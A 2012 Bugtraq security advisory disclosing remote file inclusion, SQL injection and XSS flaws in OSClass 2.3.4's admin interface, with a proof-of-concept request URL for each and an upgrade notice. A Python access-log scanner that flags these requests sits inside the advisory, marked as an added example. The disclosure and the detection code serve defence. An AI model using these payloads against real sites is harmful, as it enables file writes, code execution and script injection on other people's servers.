Message-Id: <9FD841D6-CBAF-4238-9030-603BBF29384F@codseq.it>
Date: Mon, 30 Jan 2012 13:31:58 +0100
From: Filippo Cavallarin <filippo.cavallarin@...seq.it>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in OSClass

Advisory ID:	CSA-12003
Title:	Multiple vulnerabilities in OSClass
Product:	OSClass
Version:	2.3.4 and probably prior
Vendor:	osclass.org
Vulnerability type:	SQL injection, XSS, Remote file inclusion
Vendor notification:	2012-01-12
Public disclosure:	2012-01-27


OSClass version 2.3.4 and probably earlier releases suffer from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vulnerability allows an attacker to place an arbitrary file (i.e. a malicious PHP script) on the server under the web root, so it is possible to execute shell commands with the privileges of the web server.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php

http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in the admin's ajax interface when performing the "edit_category_post" action. The GET parameter id is not sanitized.
An attacker must be logged in as admin to exploit this vulnerability; gpc_magic_quotes must be off.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201



3) SQL injection in the admin's ajax interface when performing the "enable_category" action. The GET parameter id is not sanitized.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201

(id must be a valid subcategory id; in this case gpc_magic_quotes can be on)



4) XSS in the admin's ajax interface. The GET parameter id is not sanitized.
An attacker must be logged in as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E

(id must be a valid category id)
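As an added example (not part of the advisory and not OSClass code), the following Python check flags the four request patterns above in web-server access log lines: a remote URL in the `file` parameter of the upgrade action, and a non-integer `id` on the two category actions, split into a markup case and an SQL-looking case. The log lines, the `/oc-admin/index.php` path match and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not real traffic). Line 1 is benign
# admin use; lines 2-4 mirror the advisory's request patterns.
LOG_LINES = [
    '10.0.0.5 - - [30/Jan/2012:13:31:58 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2 HTTP/1.1" 200 12',
    '10.0.0.5 - - [30/Jan/2012:13:32:01 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php HTTP/1.1" 200 12',
    '10.0.0.5 - - [30/Jan/2012:13:32:05 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20\'/tmp/poc\'%20--%201 HTTP/1.1" 500 0',
    '10.0.0.5 - - [30/Jan/2012:13:32:09 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover=\'alert(1)\'%3E HTTP/1.1" 200 12',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Actions named in the advisory whose "id" must be an integer category id.
ID_ACTIONS = {"edit_category_post", "enable_category"}

def classify_request(target):
    """Return a list of finding labels for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    if not parts.path.endswith("/oc-admin/index.php"):
        return findings
    # parse_qs URL-decodes both keys and values, so %3C becomes "<" here.
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if q.get("page") != "ajax":
        return findings
    action = q.get("action", "")
    # 1) upgrade with a URL in "file": the osc_downloadFile() remote-file vector.
    if action == "upgrade" and re.match(r"^[a-z][a-z0-9+.-]*://", q.get("file", ""), re.I):
        findings.append("rfi: remote file in upgrade")
    # 2)-4) category actions whose id is not a plain integer.
    if action in ID_ACTIONS:
        id_val = q.get("id", "")
        if not id_val.isdigit():
            if "<" in id_val or ">" in id_val:
                findings.append("xss: markup in id")
            elif re.search(r"['\")]|\binto\s+outfile\b|--", id_val, re.I):
                findings.append("sqli: non-numeric id")
            else:
                findings.append("invalid id")
    return findings

def scan_log(lines):
    """Return [(line_number, findings)] for every line that produced a finding."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            f = classify_request(m.group("target"))
            if f:
                hits.append((n, f))
    return hits

if __name__ == "__main__":
    for n, f in scan_log(LOG_LINES):
        print(f"line {n}: {', '.join(f)}")
```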


Solution

Upgrade to OSClass 2.3.5:

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@...seq.it
